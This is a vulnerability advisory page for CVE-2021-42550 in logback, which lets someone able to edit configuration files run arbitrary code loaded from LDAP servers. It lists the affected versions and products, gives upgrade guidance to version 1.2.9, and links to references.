First published: Thu Dec 16 2021(Updated: )
In logback version 1.2.7 and prior versions, an attacker with the required privileges to edit configurations files could craft a malicious configuration allowing to execute arbitrary code loaded from LDAP servers.
Credit: vulnerability@ncsc.ch
Affected Software | Affected Version | How to fix |
---|---|---|
redhat/logback-classic | <1.2.9 | 1.2.9 |
redhat/candlepin | <0:4.1.13-1.el7 | 0:4.1.13-1.el7 |
redhat/candlepin | <0:4.1.13-1.el8 | 0:4.1.13-1.el8 |
Qos Logback | <=1.2.7 | |
Qos Logback | =1.3.0-alpha0 | |
Qos Logback | =1.3.0-alpha1 | |
Qos Logback | =1.3.0-alpha10 | |
Qos Logback | =1.3.0-alpha2 | |
Qos Logback | =1.3.0-alpha3 | |
Qos Logback | =1.3.0-alpha4 | |
Qos Logback | =1.3.0-alpha5 | |
Qos Logback | =1.3.0-alpha6 | |
Qos Logback | =1.3.0-alpha7 | |
Qos Logback | =1.3.0-alpha8 | |
Qos Logback | =1.3.0-alpha9 | |
Redhat Satellite | =6.0 | |
NetApp Cloud Manager | ||
NetApp Service Level Manager | ||
NetApp Snap Creator Framework | ||
Siemens SINEC NMS | <1.0.3 |
Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.
(Appears in the following advisories)
CVE-2021-42550 is a vulnerability found in the logback package that allows an attacker to execute arbitrary code loaded from LDAP servers.
CVE-2021-42550 has a severity level of high.
Logback versions 1.2.7 and prior are affected by CVE-2021-42550.
To fix CVE-2021-42550, upgrade to logback version 1.2.9 or higher.
You can find more information about CVE-2021-42550 at the following references: [CVE-2021-42550](https://cve.report/CVE-2021-42550), [LOGBACK-1591](https://jira.qos.ch/browse/LOGBACK-1591), [RHSA-2022:1108](https://access.redhat.com/errata/RHSA-2022:1108).